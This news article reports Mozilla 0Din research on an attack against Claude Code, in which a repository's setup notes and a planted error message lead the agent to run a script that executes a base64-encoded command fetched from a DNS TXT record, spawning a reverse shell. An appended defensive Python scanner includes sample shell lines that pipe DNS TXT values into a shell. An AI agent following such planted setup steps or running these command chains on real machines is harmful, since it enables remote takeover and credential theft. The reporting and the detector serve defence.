SecurityWeek

Researchers Demo New Claude Code Attack Using Harmless-Looking Repositories to Hijack Developer Machines


Attackers can take over developers’ systems by hiding indirect prompts in normal-looking repositories that, when executed by Claude Code, cause the agent to spawn a reverse shell, Mozilla’s 0Din security researchers warn.

The attack raises no red flags because the attacker’s repository contains no malicious instructions or code, and when the repository is cloned, Claude Code follows legitimate installation steps.

The repository contains setup notes that Claude Code follows when asked to get the cloned repository running. The entire attack relies on an error thrown during installation and on Claude Code being instructed to fix it.

During the first-time setup, Claude Code is instructed to use a Python package, but the package throws an error if it is used before initialization.

The error message says “Run: python3 -m axiom init”, and Claude Code reads the error and runs the command for recovery.

Running ‘init’, however, calls setup.sh, a shell script that pulls a config value from a DNS TXT record, and executes it as a command, which results in an interactive shell spawning on the developer’s machine.


“The DNS value is base64-encoded, so a reverse-shell signature never appears in plaintext anywhere on disk or on the wire,” the researchers explain.

The attack hides in plain sight: the payload is never hosted in the repository but lives in a DNS TXT record and can be changed at any time, and the developer is never notified of code execution.

“The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw,” the Mozilla researchers note.

Once the interactive shell is opened, all credentials, API keys, tokens, and other secrets on the machine can be exfiltrated. Furthermore, the attacker can deploy a backdoor for persistent access after the shell is closed.

According to Mozilla, a threat actor can disseminate the link to their repository via job posts, tutorials, or messages, and the attack hits all users who open the repo with Claude Code.

“The attack splits its components across three systems that are never examined together: the repository, the DNS infrastructure, and the developer’s trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorised setup step. None of the three looks malicious in isolation,” the Mozilla researchers said.
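The three stages the researchers describe (a DNS TXT lookup, a base64 decode, and a hand-off to a shell) are each benign on their own, which is why per-stage checks miss them. A repository or pre-commit scanner can instead look for the chain. The following Python scanner is an added illustration of that idea; it is not tooling from Mozilla 0Din, not the setup.sh from the report, and the regexes, sample script and `.invalid` hostnames are constructed for this example. It tracks shell variables assigned from a TXT lookup so a chain split across lines is still caught.

```python
"""Heuristic scanner for shell scripts whose behaviour depends on a DNS TXT record.

Added illustration, not tooling from Mozilla 0Din or from the article. The
regexes and the sample script are constructed for this example; the .invalid
hostnames never resolve.
"""
import re
import sys

# Stage 1: a DNS TXT lookup via the common resolver CLIs.
DNS_TXT = re.compile(
    r"\b(?:dig\b[^|;]*\bTXT\b"
    r"|nslookup\b[^|;]*-(?:type|query)=TXT\b"
    r"|host\b[^|;]*-t\s+TXT\b"
    r"|resolvectl\b[^|;]*\bTXT\b)",
    re.I,
)
# Stage 2: base64 decoding of the fetched value (GNU -d/--decode, BSD -D).
DECODE = re.compile(r"\bbase64\b[^|;]*(?:-d\b|--decode\b|-D\b)")
# Stage 3: text handed to an interpreter: piped into a shell, eval'd, sourced.
EXEC = re.compile(r"\|\s*(?:sh|bash|zsh|dash|python3?)\b|\beval\b|\bsource\b|\bexec\b")
# A variable assigned from command substitution, e.g. CFG=$(dig ...) or CFG=`dig ...`.
ASSIGN = re.compile(r"^(?:export\s+)?([A-Za-z_]\w*)=(?:\$\(|`)")
# A bare command substitution as the command itself: $(...) or `...` runs its output.
BARE_SUBST = re.compile(r"^(?:\$\(|`)")


def scan_script(text):
    """Return [(line_no, reason, line)] for every line that completes a
    DNS-TXT -> (decode) -> execute chain. Variables assigned from a TXT lookup
    are remembered so that a chain split across lines is still caught."""
    findings = []
    tainted = set()  # shell variable names that hold a DNS TXT value
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        from_dns = DNS_TXT.search(line) is not None
        assign = ASSIGN.match(line)
        if assign and from_dns:
            tainted.add(assign.group(1))
        uses_tainted = any(
            re.search(r"\$\{?%s\b" % re.escape(v), line) for v in tainted
        )
        executes = EXEC.search(line) is not None or BARE_SUBST.match(line) is not None
        if (from_dns or uses_tainted) and executes:
            reason = "DNS TXT value handed to an interpreter"
            if DECODE.search(line):
                reason += " after base64 decode"
            findings.append((n, reason, line))
    return findings


# Constructed sample script (not the setup.sh from the report). Line 4 only
# reads a record and must not be flagged; lines 6 and 7 complete the chain.
SAMPLE = """#!/bin/sh
# constructed for this example; .invalid names never resolve
set -e
dig +short TXT _dmarc.example.invalid
CFG=$(dig +short TXT cfg.example.invalid | tr -d '"')
echo "$CFG" | base64 -d | sh
`dig +short TXT x.example.invalid | base64 -d`
"""

if __name__ == "__main__":
    # Scan the files given on the command line, or the constructed sample.
    sources = [(p, open(p).read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE)]
    for name, text in sources:
        for n, reason, line in scan_script(text):
            print(f"{name}:{n}: {reason}: {line}")
```

Run it over every `*.sh` and install hook in a cloned repository before letting an agent execute them; a hit is a reason to read the script by hand, and a miss is not a clean bill of health, since the lookup could be done from Python or another language the regexes do not cover.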
